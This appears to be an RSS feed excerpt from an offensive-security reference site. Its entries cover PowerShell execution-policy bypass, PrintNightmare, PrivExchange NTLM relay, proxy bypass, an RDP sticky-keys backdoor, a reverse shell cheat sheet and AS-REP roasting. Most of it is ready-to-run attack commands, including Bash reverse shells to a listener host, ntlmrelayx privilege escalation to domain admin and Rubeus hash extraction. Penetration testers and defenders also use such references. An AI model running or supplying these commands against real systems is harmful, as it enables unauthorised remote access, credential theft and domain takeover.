&lt;li&gt;&lt;a href="#resolve-address-functions"&gt;Resolve address functions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#delegatetype-reflection"&gt;DelegateType Reflection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#example-with-a-simple-shellcode-runner"&gt;Example with a simple shellcode runner&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#secure-string-to-plaintext"&gt;Secure String to Plaintext&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="execution-policy" class="anchored-heading"&gt;Execution Policy&lt;a class="heading-anchor" href="#execution-policy" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powershell&lt;/span&gt; &lt;span class="n"&gt;-EncodedCommand&lt;/span&gt; &lt;span class="nv"&gt;$encodedCommand&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powershell&lt;/span&gt; &lt;span class="n"&gt;-ep&lt;/span&gt; &lt;span class="n"&gt;bypass&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;PowerView&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Change execution policy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Set-Executionpolicy&lt;/span&gt; &lt;span class="n"&gt;-Scope&lt;/span&gt; &lt;span class="n"&gt;CurrentUser&lt;/span&gt; &lt;span class="n"&gt;-ExecutionPolicy&lt;/span&gt; &lt;span class="n"&gt;UnRestricted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Set-ExecutionPolicy&lt;/span&gt; &lt;span class="n"&gt;Bypass&lt;/span&gt; &lt;span class="n"&gt;-Scope&lt;/span&gt; &lt;span class="k"&gt;Process&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="constrained-mode" class="anchored-heading"&gt;Constrained Mode&lt;a class="heading-anchor" href="#constrained-mode" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Check if we are in a constrained mode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Values could be: FullLanguage or ConstrainedLanguage&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$ExecutionContext&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;SessionState&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LanguageMode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;## Bypass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powershell&lt;/span&gt; &lt;span class="n"&gt;-version&lt;/span&gt; &lt;span class="mf"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="encoded-commands" class="anchored-heading"&gt;Encoded Commands&lt;a class="heading-anchor" href="#encoded-commands" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Windows&lt;/p&gt;</description></item><item><title>PrintNightmare</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/cve/printnightmare/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/cve/printnightmare/</guid><description>&lt;blockquote&gt;
&lt;p&gt;CVE-2021-1675 / CVE-2021-34527&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The DLL will be stored in &lt;code&gt;C:\Windows\System32\spool\drivers\x64\3\&lt;/code&gt;.
The exploit will execute the DLL either from the local filesystem or a remote share.&lt;/p&gt;
&lt;p&gt;Requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Spooler Service&lt;/strong&gt; enabled (Mandatory)&lt;/li&gt;
&lt;li&gt;Server with patches &amp;lt; June 2021&lt;/li&gt;
&lt;li&gt;DC with &lt;code&gt;Pre Windows 2000 Compatibility&lt;/code&gt; group&lt;/li&gt;
&lt;li&gt;Server with registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall&lt;/code&gt; = (DWORD) 1&lt;/li&gt;
&lt;li&gt;Server with registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA&lt;/code&gt; = (DWORD) 0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Detect the vulnerability&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Impacket - &lt;a href="https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py"&gt;impacket/rpcdump&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;rpcdump&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="nv"&gt;@10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="n"&gt;egrep&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;MS-RPRN|MS-PAR&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Protocol&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;MS-RPRN&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Print&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt; &lt;span class="n"&gt;Remote&lt;/span&gt; &lt;span class="n"&gt;Protocol&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/byt3bl33d3r/ItWasAllADream"&gt;byt3bl33d3r/ItWasAllADream&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;&lt;span class="n"&gt;ItWasAllADream&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;poetry&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;poetry&lt;/span&gt; &lt;span class="n"&gt;shell&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;itwasalladream&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;Password123&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;10&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="mf"&gt;24&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;docker&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="n"&gt;-it&lt;/span&gt; &lt;span class="n"&gt;itwasalladream&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;Password123&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Payload Hosting&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>PrivExchange</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/cve/privexchange/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/cve/privexchange/</guid><description>&lt;p&gt;Exchange your privileges for Domain Admin privs by abusing Exchange.
:warning: You need a shell on a user account with a mailbox.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Exchange server hostname or IP address&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;pth-net rpc group members &lt;span class="s2"&gt;&amp;#34;Exchange Servers&amp;#34;&lt;/span&gt; -I dc01.domain.local -U domain/username
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ntlmrelayx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;dc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-escalate-user&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server&amp;rsquo;s to send back its NTLMv2 hash to a controlled machine.&lt;/p&gt;</description></item><item><title>Proxy Bypass</title><link>https://bokkapig.pages.dev/refs/internal/redteam/evasion/proxy-bypass/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/evasion/proxy-bypass/</guid><description>&lt;blockquote&gt;
&lt;p&gt;An HTTP proxy server acts as an intermediary between a client (like a web browser) and a web server. It processes client requests for web resources, fetches them from the destination server, and returns them to the client.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#methodology"&gt;Methodology&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#discover-proxy-configuration"&gt;Discover Proxy Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pac-proxy"&gt;PAC Proxy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#common-bypass"&gt;Common Bypass&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="methodology" class="anchored-heading"&gt;Methodology&lt;a class="heading-anchor" href="#methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="discover-proxy-configuration" class="anchored-heading"&gt;Discover Proxy Configuration&lt;a class="heading-anchor" href="#discover-proxy-configuration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Windows, in the registry key &lt;code&gt;DefaultConnectionSettings&lt;/code&gt;&lt;/p&gt;</description></item><item><title>RDP - Persistence</title><link>https://bokkapig.pages.dev/refs/internal/redteam/persistence/rdp-persistence/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/persistence/rdp-persistence/</guid><description>&lt;h2 id="rdp-backdoor" class="anchored-heading"&gt;RDP Backdoor&lt;a class="heading-anchor" href="#rdp-backdoor" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;An RDP backdoor is a malicious technique where an attacker replaces the legitimate binary files of utility manager (utilman.exe) or sticky keys (sethc.exe) with a command prompt (cmd.exe) executable. This allows the attacker to gain unauthorized access to the system by launching a command prompt when the ease of access or sticky keys button is pressed on the login screen, bypassing the need for authentic credentials.&lt;/p&gt;</description></item><item><title>Reverse Shell Cheat Sheet</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/shell-reverse-cheatsheet/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/shell-reverse-cheatsheet/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#reverse-shell"&gt;Reverse Shell&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#awk"&gt;Awk&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bash-tcp"&gt;Bash TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bash-udp"&gt;Bash UDP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#c"&gt;C&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dart"&gt;Dart&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#golang"&gt;Golang&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#groovy-alternative-1"&gt;Groovy Alternative 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#groovy"&gt;Groovy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#java-alternative-1"&gt;Java Alternative 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#java-alternative-2"&gt;Java Alternative 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#java"&gt;Java&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lua"&gt;Lua&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ncat"&gt;Ncat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#netcat-openbsd"&gt;Netcat OpenBsd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#netcat-busybox"&gt;Netcat BusyBox&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#netcat-traditional"&gt;Netcat Traditional&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#nodejs"&gt;NodeJS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ognl"&gt;OGNL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#openssl"&gt;OpenSSL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#perl"&gt;Perl&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#php"&gt;PHP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell"&gt;Powershell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#python"&gt;Python&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ruby"&gt;Ruby&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rust"&gt;Rust&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#socat"&gt;Socat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#telnet"&gt;Telnet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#war"&gt;War&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#meterpreter-shell"&gt;Meterpreter Shell&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#windows-staged-reverse-tcp"&gt;Windows Staged reverse TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#windows-stageless-reverse-tcp"&gt;Windows Stageless reverse TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#linux-staged-reverse-tcp"&gt;Linux Staged reverse TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#linux-stageless-reverse-tcp"&gt;Linux Stageless reverse TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#other-platforms"&gt;Other platforms&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#spawn-tty-shell"&gt;Spawn TTY Shell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.revshells.com/"&gt;reverse-shell-generator&lt;/a&gt; - Hosted Reverse Shell generator (&lt;a href="https://github.com/0dayCTF/reverse-shell-generator"&gt;source&lt;/a&gt;) &lt;img src="https://user-images.githubusercontent.com/44453666/115149832-d6a75980-a033-11eb-9c50-56d4ea8ca57c.png" alt="image" loading="lazy" decoding="async"&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/t0thkr1s/revshellgen"&gt;revshellgen&lt;/a&gt; - CLI Reverse Shell generator&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="reverse-shell" class="anchored-heading"&gt;Reverse Shell&lt;a class="heading-anchor" href="#reverse-shell" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="bash-tcp" class="anchored-heading"&gt;Bash TCP&lt;a class="heading-anchor" href="#bash-tcp" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;bash -i &amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt; /dev/tcp/10.0.0.1/4242 0&amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;0&amp;lt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;196&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;exec&lt;/span&gt; 196&amp;lt;&amp;gt;/dev/tcp/10.0.0.1/4242&lt;span class="p"&gt;;&lt;/span&gt; sh &amp;lt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;196&lt;/span&gt; &amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;196&lt;/span&gt; 2&amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;196&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/bin/bash -l &amp;gt; /dev/tcp/10.0.0.1/4242 0&amp;lt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt; 2&amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="bash-udp" class="anchored-heading"&gt;Bash UDP&lt;a class="heading-anchor" href="#bash-udp" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;Victim:
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sh -i &amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt; /dev/udp/10.0.0.1/4242 0&amp;gt;&lt;span class="p"&gt;&amp;amp;&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;Listener:
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;nc -u -lvp &lt;span class="m"&gt;4242&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Don&amp;rsquo;t forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash&lt;/p&gt;</description></item><item><title>Roasting - ASREP Roasting</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-roasting-asrep/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-roasting-asrep/</guid><description>&lt;blockquote&gt;
&lt;p&gt;If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Accounts with the attribute &lt;strong&gt;DONT_REQ_PREAUTH&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Windows/Linux:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bloodyAD&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;totoTOTOtoto1234*&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;crash&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-host&lt;/span&gt; &lt;span class="mf"&gt;10.100&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;5&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;search&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-filter&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(&amp;amp;(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-attr&lt;/span&gt; &lt;span class="n"&gt;sAMAccountName&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;Windows only:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;PowerView&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-DomainUser&lt;/span&gt; &lt;span class="n"&gt;-PreauthNotRequired&lt;/span&gt; &lt;span class="n"&gt;-Properties&lt;/span&gt; &lt;span class="n"&gt;distinguishedname&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/GhostPack/Rubeus"&gt;Rubeus&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Rubeus&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;Rubeus&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;asreproast&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;TestOU3user&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;hashcat&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;outfile&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;hashes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;asreproast&lt;/span&gt;
